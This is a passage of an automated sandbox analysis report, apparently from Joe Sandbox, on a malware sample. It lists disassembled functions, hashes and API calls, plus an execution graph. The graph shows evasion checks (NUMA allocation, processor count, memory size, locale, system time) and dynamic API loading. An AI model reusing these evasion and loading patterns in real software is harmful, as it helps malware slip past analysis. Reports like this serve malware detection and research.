                                                                                  • Instruction ID: 234f7af06bb4d2cfe7d156c535c438698ebafdaba05db754f83e5affc552a317
                                                                                  • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                  • Instruction Fuzzy Hash: FD211A79A00219CFCF44EF68C5849ADB7F1FF88314B158569E906EB351CB70AA45CF91
                                                                                  Function 00410EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: SpinWait
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2810355486-1785270423
                                                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                                                  Function 0484111F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: SpinWait
                                                                                  • String ID: 11@
                                                                                  • API String ID: 2810355486-1785270423
                                                                                  • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction ID: 34bf539309afac6b13fb13e7eb8d41dc9d9db9625dc74e7b0b8f1c1918005ea2
                                                                                  • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                  • Instruction Fuzzy Hash: 4E017531A5072A9FCB259F39D91C666BBD0EB81721F149E29D056C3A65C6A1F8C0CB81
                                                                                  Function 004353E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: String
                                                                                  • String ID: 11@$LCMapStringEx
                                                                                  • API String ID: 2568140703-3516914342
                                                                                  • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                  • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                                                  • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                  • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                                                  Function 0040C535 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___std_exception_destroy
                                                                                  • String ID: f(@$ios_base::failbit set
                                                                                  • API String ID: 4194217158-3705395444
                                                                                  • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                  • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                                                  • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                  • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                                                  Function 0484DC92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0484DCDA
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0484DCE8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: 11@
                                                                                  • API String ID: 1687795959-1785270423
                                                                                  • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction ID: 2dcbf820e566526b7c45d5e149aceaa6cb09f3c7de86b82dc57a9b88601813c4
                                                                                  • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                  • Instruction Fuzzy Hash: 19F059397005195BCB04EB58DC84C1DF7E9AF85A653100976ED02D3351CBF0FD0586D4
                                                                                  Function 0043524A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultUser
                                                                                  • String ID: 11@$GetUserDefaultLocaleName
                                                                                  • API String ID: 3358694519-96072240
                                                                                  • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                  • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                                                  • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                  • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                                                  Function 00435313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocaleValid
                                                                                  • String ID: 11@$IsValidLocaleName
                                                                                  • API String ID: 1901932003-3041995494
                                                                                  • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                  • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                                                  • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                  • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                                                  Function 004352B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountCriticalInitializeSectionSpin
                                                                                  • String ID: 11@$InitializeCriticalSectionEx
                                                                                  • API String ID: 2593887523-3358978645
                                                                                  • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                  • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                                                  • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                  • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                                                  Function 004406AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3_catch
                                                                                  • String ID: MOC$RCC
                                                                                  • API String ID: 3886170330-2084237596
                                                                                  • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                                                  • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                  • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                                                  Function 004350DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free
                                                                                  • String ID: 11@$FlsFree
                                                                                  • API String ID: 3978063606-2352678666
                                                                                  • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                  • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                                                  • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                  • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                                                  Function 00435085 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Alloc
                                                                                  • String ID: 11@$FlsAlloc
                                                                                  • API String ID: 2773662609-288891599
                                                                                  • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                  • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                                                  • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                  • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                                                  Function 00429FC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: try_get_function
                                                                                  • String ID: 11@$FlsAlloc
                                                                                  • API String ID: 2742660187-288891599
                                                                                  • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                  • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                                                  • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                  • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                                                  Function 004212DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                  • String ID: pThreadProxy
                                                                                  • API String ID: 1687795959-3651400591
                                                                                  • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                  • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                                                  • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                  • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                                                  Function 0041A897 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                                                  • Hash.LIBCONCRT ref: 0041A8AE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                                                  • String ID: +hB
                                                                                  • API String ID: 3232699325-4272926976
                                                                                  • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                  • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                                                  • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                  • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                                                  Function 0042AEAA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                                                  • GetLastError.KERNEL32 ref: 0042AF4E
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1717984340-0
                                                                                  • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                  • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                                                  • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                  • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                                                  Function 0485B111 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,04832ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,04832ACD,00000000), ref: 0485B1A7
                                                                                  • GetLastError.KERNEL32 ref: 0485B1B5
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,04832ACD,00000000), ref: 0485B210
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1717984340-0
                                                                                  • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                  • Instruction ID: 8f7d7ada0d358742ee1346f6d29cd5053f3b9cfecc53200bfa84dcebe1e6c334
                                                                                  • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                  • Instruction Fuzzy Hash: 4741E435600205AFDF219FA9D84467E7BA5EF11315F144B69EC59D71B0DB30B901CB61

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.9%
                                                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                                                  Signature Coverage:1%
                                                                                  Total number of Nodes:1418
                                                                                  Total number of Limit Nodes:28
                                                                                  execution_graph 27621 409440 strlen malloc strcpy_s free std::exception::exception 27622 b104b7 88 API calls 27623 b10cb6 30 API calls 27692 41ce48 LeaveCriticalSection _raise 27693 b06ebc VirtualProtect 27624 41b050 6 API calls 3 library calls 27663 b1cd90 173 API calls 3 library calls 27627 b1d0af RtlLeaveCriticalSection __initptd 27695 b132ae 22 API calls 27727 406f60 memcpy 27628 41dc60 atexit 27696 b1ae93 43 API calls 2 library calls 27728 410765 279 API calls 27697 b10297 149 API calls 27698 417667 lstrcpy 27606 8d97a6 27607 8d97b5 27606->27607 27610 8d9f46 27607->27610 27615 8d9f61 27610->27615 27611 8d9f6a CreateToolhelp32Snapshot 27612 8d9f86 Module32First 27611->27612 27611->27615 27613 8d97be 27612->27613 27614 8d9f95 27612->27614 27617 8d9c05 27614->27617 27615->27611 27615->27612 27618 8d9c30 27617->27618 27619 8d9c79 27618->27619 27620 8d9c41 VirtualAlloc 27618->27620 27619->27619 27620->27619 27629 b13823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27700 41b270 5 API calls 2 library calls 27665 b1118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27666 b1cd8f 6 API calls 2 library calls 27631 b1102b StrCmpCA strtok_s 27633 b130f9 7 API calls 27634 41bc11 71 API calls 2 library calls 27672 b135e4 9 API calls 27673 b119e7 6 API calls 27635 b1cce9 162 API calls ___crtLCMapStringA 27637 b130d0 9 API calls 27640 41ac2c 71 API calls 2 library calls 27641 b13823 10 API calls 27731 b113c7 strtok_s strtok_s 27643 b1102b StrCmpCA StrCmpCA strtok_s 27645 4090c3 5 API calls allocator 27646 b11c35 110 API calls 27733 b09b37 7 API calls 27735 41abd0 free codecvt std::exception::_Tidy 27677 b11525 strtok_s strtok_s lstrlen lstrcpy codecvt 27736 413916 91 API calls 2 library calls 27737 b0932a ??2@YAPAXI RaiseException allocator 27738 4183dc 15 API calls 27712 b115b3 18 API calls codecvt 27651 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27741 b112eb strtok_s lstrlen lstrcpy 27714 41ceea SetUnhandledExceptionFilter 26161 4169f0 26204 402260 26161->26204 26178 417850 3 API calls 26179 416a30 26178->26179 26180 4178e0 3 API calls 26179->26180 26181 416a43 26180->26181 26337 41a9b0 26181->26337 26183 416a64 26184 41a9b0 4 API calls 26183->26184 26185 416a6b 26184->26185 26186 41a9b0 4 API calls 26185->26186 26187 416a72 26186->26187 26188 41a9b0 4 API calls 26187->26188 26189 416a79 26188->26189 26190 41a9b0 4 API calls 26189->26190 26191 416a80 26190->26191 26345 41a8a0 26191->26345 26193 416b0c 26349 416920 GetSystemTime 26193->26349 26195 416a89 26195->26193 26197 416ac2 OpenEventA 26195->26197 26199 416af5 CloseHandle Sleep 26197->26199 26201 416ad9 26197->26201 26202 416b0a 26199->26202 26200 416b16 CloseHandle ExitProcess 26203 416ae1 CreateEventA 26201->26203 26202->26195 26203->26193 26546 4045c0 17 API calls 26204->26546 26206 402274 26207 4045c0 34 API calls 26206->26207 26208 40228d 26207->26208 26209 4045c0 34 API calls 26208->26209 26210 4022a6 26209->26210 26211 4045c0 34 API calls 26210->26211 26212 4022bf 26211->26212 26213 4045c0 34 API calls 26212->26213 26214 4022d8 26213->26214 26215 4045c0 34 API calls 26214->26215 26216 4022f1 26215->26216 26217 4045c0 34 API calls 26216->26217 26218 40230a 26217->26218 26219 4045c0 34 API calls 26218->26219 26220 402323 26219->26220 26221 4045c0 34 API calls 26220->26221 26222 40233c 26221->26222 26223 4045c0 34 API calls 26222->26223 26224 402355 26223->26224 26225 4045c0 34 API calls 26224->26225 26226 40236e 26225->26226 26227 4045c0 34 API calls 26226->26227 26228 402387 26227->26228 26229 4045c0 34 API calls 26228->26229 26230 4023a0 26229->26230 26231 4045c0 34 API calls 26230->26231 26232 4023b9 26231->26232 26233 4045c0 34 API calls 26232->26233 26234 4023d2 26233->26234 26235 4045c0 34 API calls 26234->26235 26236 4023eb 26235->26236 26237 4045c0 34 API calls 26236->26237 26238 402404 26237->26238 26239 4045c0 34 API calls 26238->26239 26240 40241d 26239->26240 26241 4045c0 34 API calls 26240->26241 26242 402436 26241->26242 26243 4045c0 34 API calls 26242->26243 26244 40244f 26243->26244 26245 4045c0 34 API calls 26244->26245 26246 402468 26245->26246 26247 4045c0 34 API calls 26246->26247 26248 402481 26247->26248 26249 4045c0 34 API calls 26248->26249 26250 40249a 26249->26250 26251 4045c0 34 API calls 26250->26251 26252 4024b3 26251->26252 26253 4045c0 34 API calls 26252->26253 26254 4024cc 26253->26254 26255 4045c0 34 API calls 26254->26255 26256 4024e5 26255->26256 26257 4045c0 34 API calls 26256->26257 26258 4024fe 26257->26258 26259 4045c0 34 API calls 26258->26259 26260 402517 26259->26260 26261 4045c0 34 API calls 26260->26261 26262 402530 26261->26262 26263 4045c0 34 API calls 26262->26263 26264 402549 26263->26264 26265 4045c0 34 API calls 26264->26265 26266 402562 26265->26266 26267 4045c0 34 API calls 26266->26267 26268 40257b 26267->26268 26269 4045c0 34 API calls 26268->26269 26270 402594 26269->26270 26271 4045c0 34 API calls 26270->26271 26272 4025ad 26271->26272 26273 4045c0 34 API calls 26272->26273 26274 4025c6 26273->26274 26275 4045c0 34 API calls 26274->26275 26276 4025df 26275->26276 26277 4045c0 34 API calls 26276->26277 26278 4025f8 26277->26278 26279 4045c0 34 API calls 26278->26279 26280 402611 26279->26280 26281 4045c0 34 API calls 26280->26281 26282 40262a 26281->26282 26283 4045c0 34 API calls 26282->26283 26284 402643 26283->26284 26285 4045c0 34 API calls 26284->26285 26286 40265c 26285->26286 26287 4045c0 34 API calls 26286->26287 26288 402675 26287->26288 26289 4045c0 34 API calls 26288->26289 26290 40268e 26289->26290 26291 419860 26290->26291 26550 419750 GetPEB 26291->26550 26293 419868 26294 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26293->26294 26295 41987a 26293->26295 26296 419af4 GetProcAddress 26294->26296 26297 419b0d 26294->26297 26298 41988c 21 API calls 26295->26298 26296->26297 26299 419b46 26297->26299 26300 419b16 GetProcAddress GetProcAddress 26297->26300 26298->26294 26301 419b68 26299->26301 26302 419b4f GetProcAddress 26299->26302 26300->26299 26303 419b71 GetProcAddress 26301->26303 26304 419b89 26301->26304 26302->26301 26303->26304 26305 416a00 26304->26305 26306 419b92 GetProcAddress GetProcAddress 26304->26306 26307 41a740 26305->26307 26306->26305 26308 41a750 26307->26308 26309 416a0d 26308->26309 26310 41a77e lstrcpy 26308->26310 26311 4011d0 26309->26311 26310->26309 26312 4011e8 26311->26312 26313 401217 26312->26313 26314 40120f ExitProcess 26312->26314 26315 401160 GetSystemInfo 26313->26315 26316 401184 26315->26316 26317 40117c ExitProcess 26315->26317 26318 401110 GetCurrentProcess VirtualAllocExNuma 26316->26318 26319 401141 ExitProcess 26318->26319 26320 401149 26318->26320 26551 4010a0 VirtualAlloc 26320->26551 26323 401220 26555 4189b0 26323->26555 26326 40129a 26329 416770 GetUserDefaultLangID 26326->26329 26327 401292 ExitProcess 26328 401249 __aulldiv 26328->26326 26328->26327 26330 4167d3 GetUserDefaultLCID 26329->26330 26331 416792 26329->26331 26330->26178 26331->26330 26332 4167c1 ExitProcess 26331->26332 26333 4167a3 ExitProcess 26331->26333 26334 4167b7 ExitProcess 26331->26334 26335 4167cb ExitProcess 26331->26335 26336 4167ad ExitProcess 26331->26336 26557 41a710 26337->26557 26339 41a9c1 lstrlenA 26341 41a9e0 26339->26341 26340 41aa18 26558 41a7a0 26340->26558 26341->26340 26343 41a9fa lstrcpy lstrcatA 26341->26343 26343->26340 26344 41aa24 26344->26183 26346 41a8bb 26345->26346 26347 41a90b 26346->26347 26348 41a8f9 lstrcpy 26346->26348 26347->26195 26348->26347 26562 416820 26349->26562 26351 41698e 26352 416998 sscanf 26351->26352 26591 41a800 26352->26591 26354 4169aa SystemTimeToFileTime SystemTimeToFileTime 26355 4169e0 26354->26355 26356 4169ce 26354->26356 26358 415b10 26355->26358 26356->26355 26357 4169d8 ExitProcess 26356->26357 26359 415b1d 26358->26359 26360 41a740 lstrcpy 26359->26360 26361 415b2e 26360->26361 26593 41a820 lstrlenA 26361->26593 26364 41a820 2 API calls 26365 415b64 26364->26365 26366 41a820 2 API calls 26365->26366 26367 415b74 26366->26367 26597 416430 26367->26597 26370 41a820 2 API calls 26371 415b93 26370->26371 26372 41a820 2 API calls 26371->26372 26373 415ba0 26372->26373 26374 41a820 2 API calls 26373->26374 26375 415bad 26374->26375 26376 41a820 2 API calls 26375->26376 26377 415bf9 26376->26377 26606 4026a0 26377->26606 26385 415cc3 26386 416430 lstrcpy 26385->26386 26387 415cd5 26386->26387 26388 41a7a0 lstrcpy 26387->26388 26389 415cf2 26388->26389 26390 41a9b0 4 API calls 26389->26390 26391 415d0a 26390->26391 26392 41a8a0 lstrcpy 26391->26392 26393 415d16 26392->26393 26394 41a9b0 4 API calls 26393->26394 26395 415d3a 26394->26395 26396 41a8a0 lstrcpy 26395->26396 26397 415d46 26396->26397 26398 41a9b0 4 API calls 26397->26398 26399 415d6a 26398->26399 26400 41a8a0 lstrcpy 26399->26400 26401 415d76 26400->26401 26402 41a740 lstrcpy 26401->26402 26403 415d9e 26402->26403 27332 